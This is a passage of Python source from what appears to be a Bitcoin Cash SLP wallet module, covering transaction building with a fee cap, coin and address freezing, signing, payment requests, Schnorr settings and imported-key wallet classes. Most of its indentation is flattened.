assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
# determine if this transaction should utilize all available inputs
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
        tx_in_bytes = tx.estimated_size()
        fee_in_satoshis = tx.get_fee()
        sats_per_byte = fee_in_satoshis / tx_in_bytes
        if sats_per_byte > 50:
            raise ExcessiveFee()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
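        # Usage sketch (hypothetical values): is_frozen_coin(coin_dict) -> bool,
        # while is_frozen_coin({"aa..ff:0", "aa..ff:1"}) returns the subset of those
        # "prevout_hash:n" strings that are currently frozen.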
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
        call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
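        # Usage sketch (hypothetical; `coins` is assumed to be a list of coin dicts
        # from get_utxos()):
        #     wallet.set_frozen_coin_state(coins, True, temporary=True)  # freeze, in-memory only
        #     wallet.set_frozen_coin_state(coins, False)                 # unfreeze both sets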
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def _slp_callback_on_status(self, event, *args):
if self.is_slp and args[0] == 'connected':
self.activate_slp()
def start_threads(self, network):
self.network = network
if self.network:
if self.is_slp:
# Note: it's important that SLP data structures are defined
# before the network (SPV/Synchronizer) callbacks are installed
# otherwise we may receive a tx from the network thread
# before SLP objects are properly constructed.
self.slp_graph_0x01 = slp_validator_0x01.shared_context
self.slp_graph_0x01_nft = slp_validator_0x01_nft1.shared_context_nft1
self.activate_slp()
self.network.register_callback(self._slp_callback_on_status, ['status'])
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
            self.cashacct.start(self.network) # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
            # Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
            # because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
            # Now no references to the synchronizer or verifier
# remain so they will be GC-ed
if self.is_slp:
# NB: it's important this be done here after network
# callbacks are torn down in the above lines.
self.network.unregister_callback(self._slp_callback_on_status)
jobs_stopped = self.slp_graph_0x01.stop_all_for_wallet(self, timeout=2.0)
self.print_error("Stopped", len(jobs_stopped), "slp_0x01 jobs")
#jobs_stopped = self.slp_graph_0x01_nft.stop_all_for_wallet(self)
#self.print_error("Stopped", len(jobs_stopped), "slp_0x01_nft jobs")
self.slp_graph_0x01_nft.kill()
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
                break # ok, it's old. no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
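        # Find the first output of the parent tx that pays to one of our own
        # addresses; the for/else below bails out (returns None) if there is no
        # such output, since then there is nothing to spend in a child (CPFP) tx.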
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_for_bitcoinfiles(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
            # set up "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
                        if x_pubkey[0:2] not in ['02', '03', '04']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
else:
c, index = k.scan_for_pubkey_index(x_pubkey)
if c == 0:
addr = self.receiving_addresses[index]
elif c == 1:
addr = self.change_addresses[index]
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False, anyonecanpay=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
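        # Usage sketch (hypothetical): callers that re-sign many variants of the
        # same tx where only signatures change may opt in to the sighash cache:
        #     wallet.sign_transaction(tx, password, use_cache=True)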
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache, anyonecanpay=anyonecanpay)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
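        # Walk the received outputs from most- to least-confirmed; the request is
        # considered paid once the running total reaches `amount`, and we report
        # the confirmation count of the last output needed to get there.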
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
if r.get('token_id', None):
amount_text = str(r['amount'])
else:
amount_text = format_satoshis(r['amount'])
if addr.FMT_UI == addr.FMT_CASHADDR:
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
elif addr.FMT_UI == addr.FMT_SLPADDR:
if r.get('token_id', None):
token_id = r['token_id']
out['URI'] = '{}:{}?amount={}-{}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text, token_id)
else:
addr.show_cashaddr(addr.FMT_CASHADDR)
addr_text = addr.to_ui_string()
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
                if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, token_id=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if token_id:
d['token_id'] = token_id
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
            def f(x):
                addr = None  # fallback in case the lookup below fails
                try:
                    addr = x['address']
                    return self.get_address_index(addr) or addr
                except:
                    return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self._slp_txo.clear(); self.slpv1_validity.clear(); self.token_types.clear(); self.tx_tokinfo.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
            # time has passed that air-gapped systems are unlikely to lack
            # Schnorr support.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class Slp_ImportedAddressWallet(ImportedAddressWallet):
# Watch-only wallet of imported addresses
wallet_type = 'slp_imported_addr'
def __init__(self, storage):
self._sorted = None
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
